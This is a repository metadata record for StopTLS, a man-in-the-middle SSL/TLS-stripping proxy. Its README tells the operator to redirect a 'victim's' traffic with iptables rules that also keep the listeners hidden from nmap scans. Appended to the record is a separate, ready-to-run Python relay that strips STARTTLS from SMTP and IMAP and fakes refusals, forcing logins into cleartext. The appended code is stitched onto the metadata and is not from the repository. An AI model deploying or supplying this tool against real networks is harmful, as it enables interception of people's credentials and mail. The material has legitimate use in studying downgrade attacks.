{"id":13827298,"url":"https://github.com/mathewmarcus/stoptls","last_synced_at":"2026-01-17T07:58:38.650Z","repository":{"id":80112433,"uuid":"155810395","full_name":"mathewmarcus/StopTLS","owner":"mathewmarcus","description":"MitM proxy which performs opportunistic SSL/TLS stripping","archived":false,"fork":false,"pushed_at":"2019-11-05T17:11:08.000Z","size":60,"stargazers_count":16,"open_issues_count":1,"forks_count":4,"subscribers_count":2,"default_branch":"master","last_synced_at":"2024-04-24T13:41:49.279Z","etag":null,"topics":["aiohttp","asyncio","man-in-the-middle","python3","ssl","tls"],"latest_commit_sha":null,"homepage":"","language":"Python","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":null,"status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/mathewmarcus.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":null,"funding":null,"license":null,"code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":null,"support":null,"governance":null,"roadmap":null,"authors":null}},"created_at":"2018-11-02T03:40:58.000Z","updated_at":"2022-11-04T14:57:22.000Z","dependencies_parsed_at":"2023-07-09T13:33:42.918Z","dependency_job_id":null,"html_url":"https://github.com/mathewmarcus/StopTLS","commit_stats":null,"previous_names":[],"tags_count":0,"template":false,"template_full_name":null,"repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mathewmarcus%2FStopTLS","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mathewmarcus%2FStopTLS/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mathewmarcus%2FStopTLS/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mathewmarcus%2FStopTLS/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/mathewmarcus","download_url":"https://codeload.github.com/m
athewmarcus/StopTLS/tar.gz/refs/heads/master","host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":213898240,"owners_count":15654239,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2022-07-04T15:15:14.044Z","host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"}},"keywords":["aiohttp","asyncio","man-in-the-middle","python3","ssl","tls"],"created_at":"2024-08-04T09:01:53.599Z","updated_at":"2026-01-17T07:58:38.603Z","avatar_url":"https://github.com/mathewmarcus.png","language":"Python","funding_links":[],"categories":["Uncategorized"],"sub_categories":["Poisoning"],"readme":"# StopTLS\n\nStopTLS is a Man-in-the-Middle tool which performs opportunistic SSL/TLS stripping: it removes the server's offer to upgrade a cleartext connection (HTTPS links and redirects, SMTP and IMAP `STARTTLS` advertisements) so that a client which does not insist on TLS keeps talking in the clear.\n\nCurrently it supports the following protocols: HTTP(S), SMTP, and IMAP.\n\nIt requires Python \u003e= 3.5 (i.e. 
Python with support for async/await syntax), the [aiohttp](https://aiohttp.readthedocs.io/en/stable/) library, and the [Beautiful Soup](https://www.crummy.com/software/BeautifulSoup/) library for HTML parsing.\n\n## Usage\n```\nusage: main.py [--help] [-h [HTTP_PORT]] [-t [TCP_PORT]]\n               [-p {SMTP,IMAP} [{SMTP,IMAP} ...]]\n\nMitM proxy which performs opportunistic SSL/TLS stripping\n\noptional arguments:\n  --help                show this help message and exit\n  -h [HTTP_PORT], --http [HTTP_PORT]\n                        HTTP listen port [default: 10000]\n  -t [TCP_PORT], --tcp [TCP_PORT]\n                        TCP listen port [default: 49151]\n  -p {SMTP,IMAP} [{SMTP,IMAP} ...], --tcp-protocols {SMTP,IMAP} [{SMTP,IMAP} ...]\n                        supported TCP protocols\n```\n\nNote that `-h` is the HTTP listen port option, not help; use `--help` for the help text.\n\n## Setup\n### 1. Download\n```bash\n$ git clone https://github.com/mathewmarcus/StopTLS.git\n```\n\n### 2. Install Dependencies\n```bash\n$ pip install -r requirements.txt\n```\n\n### 3. Add `iptables` rules\nAdd `nat` rules that redirect the victim's traffic to, and `filter` rules that accept traffic on, the ports specified by the `-h [HTTP_PORT], --http [HTTP_PORT]` and `-t [TCP_PORT], --tcp [TCP_PORT]` options. 
\n\n`stoptls` is set up to handle HTTP traffic on one port, and all other TCP traffic on another, as indicated by the CLI options.\n\nSo, assuming the following `stoptls` invocation:\n```bash\n$ python main.py --http 8080 --tcp 8081 --tcp-protocols SMTP IMAP\n```\n\n`iptables` rules would then need to be added to the `PREROUTING` chain in the `nat` table and the `INPUT` chain in the `filter` table, as shown below:\n\n#### `nat` table, `PREROUTING` chain\n##### HTTP\n```bash\n$ sudo iptables -t nat -A PREROUTING -p tcp --dport 80 -j REDIRECT --to-port 8080\n```\n\n##### SMTP\n```bash\n$ sudo iptables -t nat -A PREROUTING -p tcp --dport 25 -j REDIRECT --to-port 8081\n$ sudo iptables -t nat -A PREROUTING -p tcp --dport 587 -j REDIRECT --to-port 8081\n```\n\n##### IMAP\n```bash\n$ sudo iptables -t nat -A PREROUTING -p tcp --dport 143 -j REDIRECT --to-port 8081\n```\n\n#### `filter` table, `INPUT` chain\nAssuming a default `DROP` policy on this chain, add rules for the `HTTP_PORT` and/or `TCP_PORT`s specified earlier. So, for the above example:\n\n##### HTTP\n```bash\n$ sudo iptables -A INPUT -p tcp --dport 8080 -m conntrack --ctorigdstport 80 -j ACCEPT\n```\n\n##### SMTP\n```bash\n$ sudo iptables -A INPUT -p tcp --dport 8081 -m conntrack --ctorigdstport 25 -j ACCEPT\n$ sudo iptables -A INPUT -p tcp --dport 8081 -m conntrack --ctorigdstport 587 -j ACCEPT\n```\n\n##### IMAP\n```bash\n$ sudo iptables -A INPUT -p tcp --dport 8081 -m conntrack --ctorigdstport 143 -j ACCEPT\n```\n\nWhy the `--ctorigdstport` option? The `conntrack` match only accepts packets belonging to a connection whose *original* destination port, before the `REDIRECT` rewrote it, was 80, 25, 587 or 143. A connection made directly to 8080 or 8081 has an original destination port of 8080 or 8081, matches none of these rules and falls through to the chain's `DROP` policy, so the `stoptls` listeners are reachable only through redirected traffic and will not appear in `nmap` scans.\n\nThese rules only act on packets that already arrive at this host; putting the host on the victim's path is outside the scope of this README.\n\n## TODO\nIt should be noted that `StopTLS` is very much a work in progress, and is essentially a POC at this point. In fact, currently, it doesn't log anything, but simply strips and proxies the connections. Below is a non-exhaustive list of features to be added.\n\n1. Logging\n2. Advanced configuration via an INI file\n3. 
Custom log/traffic filters for all protocols via config file directives and/or user-supplied callables (functions, methods, etc.)\n4. Support for additional, user-supplied protocols, by subclassing the `stoptls.base.Proxy` and/or `stoptls.tcp.base.TCPProxyConn` abstract classes\n5. Support for more complex, non-standard HTTP login mechanisms\n6. Packaging and distribution via `pip` and the `PyPI` repository\n7. Integration testing with Docker\n\n## Why?\nWhy create yet another SSL-stripping tool when...\n1. tools such as `sslstrip` and `sslsplit` already exist\n2. HTTP Strict Transport Security (HSTS) has significantly limited the effectiveness of SSL-stripping attacks.\n\nThere are several answers:\n1. I wanted to better understand the SSL-stripping attack vector.\n2. I wanted to implement an SSL-stripping proxy using Python 3's native asynchronous support via `asyncio`, as opposed to an external library such as `twisted`.\n3. I wanted a tool which supports, or can be extended to support, any TCP protocol that uses opportunistic SSL/TLS, in addition to HTTP.\n4. I wanted a tool which is highly extensible and customizable.\n","project_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fmathewmarcus%2Fstoptls","html_url":"https://awesome.ecosyste.ms/projects/github.com%2Fmathewmarcus%2Fstoptls","lists_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fmathewmarcus%2Fstoptls/lists"}
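The README above says StopTLS strips opportunistic SSL/TLS from "any TCP protocol" and that new protocols are meant to be added by subclassing its proxy classes, but it does not show what the stripping actually does to the byte stream. The following is an added example, not StopTLS's own code, showing the message rewriting at the heart of STARTTLS stripping for SMTP (RFC 3207) and IMAP (RFC 2595/3501), wrapped in a minimal `asyncio` relay of the kind the README's `--tcp` listener performs. Everything in it is illustrative: the function names are not StopTLS's, the server replies are constructed rather than captured, and the relay connects to a fixed hypothetical upstream address instead of recovering the `REDIRECT`ed original destination (a real transparent proxy would read `SO_ORIGINAL_DST`).

```python
"""Added example (not StopTLS code): STARTTLS stripping for SMTP and IMAP.
Assumptions: illustrative names, constructed sample messages, and a fixed
hypothetical upstream instead of SO_ORIGINAL_DST lookup."""
import asyncio
import re

# Constructed sample server messages (not captured from a real server).
SMTP_EHLO_REPLY = (
    b"250-mail.example.test Hello client\r\n"
    b"250-SIZE 35882577\r\n"
    b"250-STARTTLS\r\n"
    b"250 8BITMIME\r\n"
)
IMAP_GREETING = b"* OK [CAPABILITY IMAP4rev1 STARTTLS LOGINDISABLED AUTH=PLAIN] ready\r\n"

_SMTP_250 = re.compile(rb"^250([ -])(.*)$")
_IMAP_CAPS = re.compile(rb"(\[CAPABILITY |\* CAPABILITY )([^\]\r\n]*)")

def strip_smtp_ehlo(reply: bytes) -> bytes:
    """Drop STARTTLS from a multi-line EHLO reply. "250-" marks every line but
    the last, which uses "250 "; the markers are recomputed after the drop or the
    client would wait forever. Anything that is not a pure 250 reply passes through."""
    lines = reply.rstrip(b"\r\n").split(b"\r\n")
    parsed = [_SMTP_250.match(line) for line in lines]
    if not all(parsed):
        return reply
    texts = [m.group(2) for m in parsed if m.group(2).strip().upper() != b"STARTTLS"]
    if not texts:
        return reply
    rebuilt = [b"250-" + t for t in texts[:-1]] + [b"250 " + texts[-1]]
    return b"\r\n".join(rebuilt) + b"\r\n"

def strip_imap_capabilities(data: bytes) -> bytes:
    """Drop STARTTLS from IMAP greetings and CAPABILITY responses. LOGINDISABLED
    goes too: servers advertise it before TLS so clients refuse a cleartext LOGIN,
    which is exactly the refusal a stripping proxy has to prevent."""
    def rewrite(m):
        caps = [c for c in m.group(2).split(b" ")
                if c.upper() not in (b"STARTTLS", b"LOGINDISABLED")]
        return m.group(1) + b" ".join(caps)
    return _IMAP_CAPS.sub(rewrite, data)

def intercept_client(proto: str, command: bytes):
    """Return (bytes to forward upstream, bytes to answer the client). A client that
    sends STARTTLS anyway gets a protocol-correct refusal; the real server never sees it."""
    if proto == "SMTP" and command.strip().upper() == b"STARTTLS":
        return b"", b"454 4.7.0 TLS not available due to temporary reason\r\n"
    if proto == "IMAP":
        parts = command.split(None, 1)  # "<tag> STARTTLS"
        if len(parts) == 2 and parts[1].strip().upper() == b"STARTTLS":
            return b"", parts[0] + b" BAD STARTTLS not supported\r\n"
    return command, b""

def rewrite_server(proto: str, data: bytes) -> bytes:
    return strip_smtp_ehlo(data) if proto == "SMTP" else strip_imap_capabilities(data)

async def _pump_server(proto, server_r, client_w):
    # Simplification: one 4 KiB read is assumed to hold whole reply lines; a
    # production proxy buffers to line/reply boundaries before rewriting.
    while True:
        data = await server_r.read(4096)
        if not data:
            break
        client_w.write(rewrite_server(proto, data))
        await client_w.drain()
    client_w.close()

async def _pump_client(proto, client_r, client_w, server_w):
    while True:
        line = await client_r.readline()
        if not line:
            break
        forward, reply = intercept_client(proto, line)
        if reply:
            client_w.write(reply)
            await client_w.drain()
        if forward:
            server_w.write(forward)
            await server_w.drain()
    server_w.close()

async def serve(proto: str, listen_port: int, upstream):
    """Accept redirected connections on listen_port and relay them to upstream."""
    async def handle(client_r, client_w):
        server_r, server_w = await asyncio.open_connection(*upstream)
        await asyncio.gather(_pump_server(proto, server_r, client_w),
                             _pump_client(proto, client_r, client_w, server_w))
    server = await asyncio.start_server(handle, "0.0.0.0", listen_port)
    async with server:
        await server.serve_forever()

if __name__ == "__main__":
    # Hypothetical upstream SMTP server on 127.0.0.1:2525; listen port 8081 matches
    # the README's --tcp example (add the iptables rules separately).
    asyncio.run(serve("SMTP", 8081, ("127.0.0.1", 2525)))
```

The pure functions are the part worth testing against a client: a client configured to require TLS is not fooled by any of this, because the refusal is visible to it. Python's own `smtplib.SMTP.starttls()` raises `SMTPNotSupportedError` when `STARTTLS` is missing from the EHLO reply, and `imaplib.IMAP4.starttls()` fails when it is absent from the capabilities; only clients that fall back to cleartext continue, which is why the README calls the stripping opportunistic.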